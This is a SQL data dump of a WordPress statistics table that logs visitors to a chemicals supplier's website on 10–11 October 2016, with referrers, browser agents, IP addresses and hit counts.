INSERT INTO `wp_statistics_visitor` VALUES (2499, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2500, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2501, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '68.186.20.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2502, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.151.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2503, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '209.124.239.81', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2504, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.172.160.201', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2505, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '107.3.95.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2506, '2016-10-10', 'https://www.miller-stephenson.com', 'WebFuck', 'Unknown', 'Unknown', '', '103.214.170.86', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2507, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.149.134.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2508, '2016-10-10', 'https://r.search.yahoo.com/_ylt=AwrTHRWiAfxXWGQAth1XNyoA;_ylu=X3oDMTEyMWFrNzgwBGNvbG8DZ3ExBHBvcwM2BHZ0aWQDVUkyQzNfMQRzZWMDc3I-/RV=2/RE=1476162083/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fchemicals%2fepoxy-resin-systems%2fepon-epoxy%2funmodified-liquid-epoxy-resins%2f/RK=0/RS=DbaZ5QDBRqlqrjc_Jtu3HI3KBfo-', 'MSIE', 'Windows', '11.0', '', '209.203.104.45', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2509, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '98.20.147.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2510, '2016-10-10', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '129.138.137.249', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2511, '2016-10-10', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.93.225.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2512, '2016-10-10', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2513, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '70.79.104.68', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2514, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.71.71.63', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2515, '2016-10-10', 'https://www.google.ca/', 'Safari', 'iPad', '7.0', '', '156.34.16.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2516, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.39.59.58', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2517, '2016-10-10', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '74.62.146.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2518, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2519, '2016-10-10', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2520, '2016-10-10', 'https://kol-energo.ru/', 'MSIE', 'Windows', '5.5', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2521, '2016-10-10', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '24.119.102.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2522, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '204.62.206.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2523, '2016-10-10', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.208.193.251', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2524, '2016-10-10', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiCzsXYqtHPAhXEZIYKHfFQBOoYABAA&sig=AOD64_1NTZrHvP5MfNU2AtDoME5LonHBxQ&rct=j&q=&ved=0ahUKEwiWrcLYqtHPAhXCeT4KHfgvD-wQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '198.190.156.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2525, '2016-10-10', 'https://www.miller-stephenson.com', 'python-requests', 'Unknown', '2.11.1', '', '115.231.126.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2526, '2016-10-10', 'https://www.google.com.br/', 'Chrome', 'Windows', '53.0.2785.116', '', '177.182.245.39', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2527, '2016-10-10', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '74.193.126.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2528, '2016-10-10', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '9.0', '', '180.153.187.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2529, '2016-10-10', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2530, '2016-10-10', 'https://www.google.com/', 'Safari', 'iPad', '600.1.4', '', '68.205.14.69', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2531, '2016-10-10', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '65.186.78.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2532, '2016-10-10', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.69.237.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2533, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '203.75.213.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2534, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2535, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2536, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2537, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2538, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '174.199.3.101', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2539, '2016-10-11', 'https://w-journal.ru/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2540, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '73.222.240.248', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2541, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '139.5.237.146', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2542, '2016-10-11', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=38', 'MSIE', 'Windows', '9.0', '', '182.118.25.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2543, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '600.1.4', '', '68.45.238.62', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2544, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2545, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '14.36.156.26', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2546, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '112.198.243.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2547, '2016-10-11', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2548, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '31.0.1650.59', '', '88.198.22.8', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2549, '2016-10-11', 'https://www.miller-stephenson.com/chemicals/lubricants/tribosys-lubricants/connector-lubricants/', 'Safari', 'iPhone', '7.0', '', '199.30.25.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2550, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.190.17.192', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2551, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.39.35.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2552, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.252.115.8', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2553, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '14.36.156.26', '000', 101, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2554, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '98.194.104.106', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2555, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '23.226.227.139', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2556, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '107.77.109.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2557, '2016-10-11', 'https://www.google.com.hk/', 'Chrome', 'Windows', '53.0.2785.143', '', '223.197.187.113', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2558, '2016-10-11', 'https://www.google.co.jp/', 'Firefox', 'Windows', '49.0', '', '126.74.145.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2559, '2016-10-11', 'https://www.google.com.vn/', 'Chrome', 'Windows', '53.0.2785.143', '', '42.113.9.112', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2560, '2016-10-11', 'https://astana.xkaz.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2561, '2016-10-11', 'https://dp.g.doubleclick.net/apps/domainpark/domainpark.cgi?max_radlink_len=25&r=m&fexp=21404&domain_name=sanmarcosgreaseservices.com&client=dp-rookmedia02_js&channel=001043%2Ctest70%2Ctest82&hl=en&adtest=off&type=0&drid=as-drid-2348283779057022&st=CiAKEwj60sKZ2tHPAhVCgmkKHfbwCb4YBHHYaqZgH-GJthIZAG06ipDO9r87Wpn35UI2moap4agNDbs9YA&uiopt=true&q=Food%2BGrade%2BGrease&afdt=CoUCChMIiqr7qNrRzwIVhxQ_Ch1P-wsFGAEgAVCxz6ABUPDQoAFQi9H5AVDeotAFUOGi0AVQgvbVB1DRp9AJUIeo0AlQiajQCVCOqNAJUJCo0AlQkqjQCVC05-QJUMjB3A9Q54PrEFC8-ecSUIv-pxNQ-svsLFCR0a8_UN3qj0BQqNScQFCtzOtQUK6mkWBQnIHWblDxuoV6UIOl7pcBUOeOs6gBULSe1qkBUJmtisgBUKHN66ICULvQhrYCUKf3jfcEUO6y9oYFUOG_tLAFaLHPoAFo8NCgAXEAAQ_dTXTctIIBEwjg0vyo2tHPAhVIZQEKHcGoB6aNAZuOSYCRAciAFNM8Q8AMEhkAbTqKkGc19EAB0wUDvfwzGkY87TGFR0hw&oe=UTF-8&ie=UTF-8&format=p5%7Cr5%7Cs&ad=a5&adrep=2&num=0&output=caf&v=3&allwcallad=1&adext=as1%2Csr1%2Cctc1&bsl=8&u_his=38&u_tz=-300&dt=1476152980834&u_w=375&u_h=667&biw=-12245933&bih=-12245933&isw=980&ish=1461&psw=980&psh=254&frm=2&uio=uv3cs1vp1ff1sa13fa2sl1sr1cc1-af3ff2st20sd15sv15sa10lt23ld18lv18-st15sa14lt37-&jsv=45441&rurl=https%3A%2F%2Fimptestrm.com%2F%3Ffolio%3D7POG742TN%26dmn%3Dwww.sanmarcosgreaseservices.com%26ga%3DR%252FCFDNzupMFIbB1mk2q72QnZ%252FIAJddCr0gs%252B7CXINGA1SZZ5LupKhStzunR3bvA5u3T%252Bj2GvXHSkYObMo%252FsMurnRb6dlRbZG1aBVytEnTiYnjEzaEbsX7gnx%252BVCUpeOfDtBes4dUcmf16o7eSaFpPCTUWCS6M3r6JONvW%252Foxgwy6v0IxKDAOZ9YI5MzOSg6iPyRN1GAQiR8DFjZhglCumg%253D%253D%26gqsg%3DoxfSyHg4PgxEQtZ7OvXLozSfOK7BFT6A3qfq7wgAdtl9bVm1LRmimqG15FcM55Lk%26klb%3D2%26maxads%3D0%26gerf%3DvJ0x7AzISMcbLtvxHbim%252FeTpFoKT%252FFw8g9sGKPTwuDFsPKOV%252FSzb24KviD7ybJRA2XprBGOOpFRE9QEQ4XvR%252FQ%253D%253D%26cf_session%3DCiAKEwj60sKZ2tHPAhVCgmkKHfbwCb4YBHHYaqZgH-GJthIZAG06ipDO9r87Wpn35UI2moap4agNDbs9YA%26ref%3D%26cf_drid%3Das-drid-2348283779057022%26query%3DFood%2BGrade%2BGrease%26afdToken%3DCoUCChMIiqr7qNrRzwIVhxQ_Ch1P-wsFGAEgAVCxz6ABUPDQoAFQi9H5AVDeotAFUOGi0AVQgvbVB1DRp9AJUIeo0AlQiajQCVCOqNAJUJCo0AlQkqjQCVC05-QJUMjB3A9Q54PrEFC8-ecSUIv-pxNQ-svs', 'Safari', 'iPhone', '10.0', '', '67.78.113.195', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2562, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '115.139.243.158', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2563, '2016-10-11', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1205.rRhYSmou00rg_ZWFdxQ8OCRlVaoKa5P9f7KyNmpQeGY8eI3XwUfr-fH6xfIHnrt1.d1644cea04609eb389fbf83e58082eacdd13ae33&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMIVJNtoWDTa6Ctl47TPu5I&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOWJFcXJBLTUzLUdoNllPMWN3QmkwTUhaR3FpOThISXRUMjlxc0lQV2NGNi1MczBnZjhIbmQwS2MxalA2NFBMbURUUlVOM2Y4UmVKRQ&b64e=2&sign=64239a4957dab94bb49da3ff4c545af2&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4jZ2FMbJiqKWlTDR03zZYstpAUXzAK4unIpWRICsZoVetxGZpVR-tLFkWrxxIW0XOHWMD0mmIw9On9yHa4F3YTVfjGqpTUymHN1gRe0UulJQH6uLKPliPUNbI8DOqkQKD&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUano4BEc9IEYttOVpzH86xJ7gDa7rezLVgYuGYrBPlmhLlurVriSfJOuvVWGIh4SRzHAncFykZfu-rcVSL6fetthlQGbN12VI&l10n=ru&cts=1476152804377&mc=4.13394294583', 'Firefox', 'Windows', '25.0', '', '95.28.229.53', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2564, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2565, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2566, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2567, '2016-10-11', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '107.216.216.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2568, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '52.25.74.29', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2569, '2016-10-11', 'https://www.google.co.th/', 'Chrome', 'Windows', '53.0.2785.143', '', '118.174.155.84', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2570, '2016-10-11', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '44.0', '', '199.168.97.28', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2571, '2016-10-11', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '113.53.156.62', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2572, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.84.178.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2573, '2016-10-11', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '54.218.89.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2574, '2016-10-11', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1206.JRYBCbHr8XurhbcBO0CoK5C9RMYBB550SG91wZneuTTVpxcysR9xDcwwu9yD3108.453641052f4ec6a9477a4c056c52c38fd5b07ed2&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXdBQ1E3VkJaMGdpRUotb0JwdlYxNDRaT2xrMko5MkJOSndIY1lNWnhLbndsN2g5WTRrZXlVekx6LS1OWkxXbFM1eEZ5UERmM3I0TG9QSm40NlN2QWt5cjVsMGlvTUFIUg&b64e=2&sign=4cdd9908980fb401f16698624d158016&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7Jarr9eCP-dAYUdo3QD1awbV9e4arVwrWINanwXUzRDdELMGXvtqfDKYu2MhxHGYKvV6GLnrDomfaIHO4yD17FTzU87YXoVdoWgnpqLLeGoLsS3PBqEx20gX7qGT_doNtbuVQ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVkyE50ZSfmQgNA2c14k9y17sp2Y3qe_GdWr_Ky2H6qyaJbEAQcZbLmR_VB1tLTHBZvMFZ4LKnhefDGAiMM-GLRw4WpYIPKu-Q&l10n=ru&cts=1476158813027&mc=2.42912555235', 'MSIE', 'Windows', '10.0', '', '46.188.54.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2575, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '75.149.221.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2576, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '46.0.2490.86', '', '75.149.221.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2577, '2016-10-11', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '17.0', '', '107.150.65.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2578, '2016-10-11', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '107.150.65.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2579, '2016-10-11', 'https://www.google.com/', 'Edge', 'Windows', '13.10586', '', '47.151.179.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2580, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2581, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '172.56.12.134', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2582, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '59.41.73.24', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2583, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '104.222.47.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2584, '2016-10-11', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '43.0', '', '199.168.97.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2585, '2016-10-11', 'https://www.bing.com/search?q=miller+stephenson+produc+557&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '73.186.142.153', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2586, '2016-10-11', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1206.-AaOHYI9LXpydhbcFC-6v8WCLJOK7GKAVKHfaKKcHRyEr_xhLW96KGXQGw_zunrX.937e23c4792a25663a6c39aefc0fba86780d24d7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVE1iZmY1M1dpeW5mOXIwdUhXTllkODBHWDQwSld2TDM2QU15S3N6M1hreGpRS2gtS3owanN0UQ&b64e=2&sign=b2e4a084f85a7f051073a80498d9cef7&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93Xfrtkbaiwr9GHirUXpdB4eXsi9uovFkaQruWtXLleoYtfEn9kWuCOjmwBoh_9xdROIWTARGgLiH5oYh3G3D5AOjUN4K6GQ4R9w0A6A3rcyTFN0U_TkkqffnshXns2WdfXN2IVuo&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWAB4NbWhozjo9y9lGoBR2iySYruLKvGxhTCsiRVZsJM_-AzELehYt8x6neJqSCz-fXYFDKmS7RSnTvOwuibcMRRiS-BWdJXE0&l10n=ru&cts=1476161598824&mc=4.41358077949', 'Chrome', 'Windows', '31.0.1650.63', '', '188.255.61.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2587, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.170.80', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2588, '2016-10-11', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1206.wXVys78OhHiV1mEAvaK-PdVbTByqdGb4vQ3AIs3n0r0rANvuZOLNFrI6J7r8p5-0.657601c1b221c99e53ca420a8f7ac9d343711c96&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXh6MWltUlVTSUtvbmFJNXNyUGF0RXRuNVRwNHhxTThuTUZCclRWa2pDVjhYR2V6dzRIckFiTW9EbzNlblRsRzhUeFJ1VVA3N0ZDYlhkYUc4QWJSZnFR&b64e=2&sign=16d2ba2dbbdc41673307fb61925b2867&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiPNn1etKLf6I26EkrOw1ES-t89h9qrUog_fXeTdqjpPODjsPF-He-6gH66medaX3h-gT4kh-_z1-4uceNkSbp8QNdQUOWdT6bUMi4dlfAwwLwgprzA8f6gN1BGcOx1twX&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs-LPxHynlQovLWjc9H9Og2XAPEUtbYa6XaBK4js83OwMB1FQm86fm6G88-iU187IuZZN4M_ySGYcITL1dZbH8jc&l10n=ru&cts=1476158994246&mc=6.19805157203', 'MSIE', 'Windows', '10.0', '', '195.91.224.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2589, '2016-10-11', 'https://www.google.co.id/', 'Chrome', 'Windows', '32.0.1700.4', '', '192.168.7.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2590, '2016-10-11', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwitr4qei9LPAhUW2GMKHUPOBmMQFggzMAY&usg=AFQjCNEFknH5uZtkjIebKtkpVKPk56uG-A', 'MSIE', 'Windows', '7.0', '', '203.253.144.72', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2591, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '203.253.144.72', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2592, '2016-10-11', 'https://www.miller-stephenson.com/tech-support/', 'MSIE', 'Windows', '9.0', '', '182.118.20.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2593, '2016-10-11', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.4.1', '', '213.127.45.254', '000', 55, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2594, '2016-10-11', 'https://www.bing.com/search?q=miller+stephenson&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '132.3.45.80', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2595, '2016-10-11', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20v;Ydrz3MYiaKDvL1WVafGnnU0RhgcakQyz8Op/6f2GVmc=', 'MSIE', 'Windows', '11.0', '', '132.3.45.78', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2596, '2016-10-11', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '132.3.45.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2597, '2016-10-11', 'https://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwi7rr_PkdLPAhXII8AKHWiRBC8QFghSMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F&usg=AFQjCNHb06o1qEUMWWwyPw2EGjHda1K7WQ', 'MSIE', 'Windows', '11.0', '', '178.119.111.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2598, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '47.0.2526.80', '', '213.189.136.90', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2599, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.122', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2600, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '91.208.188.17', '000', 2, 0); 
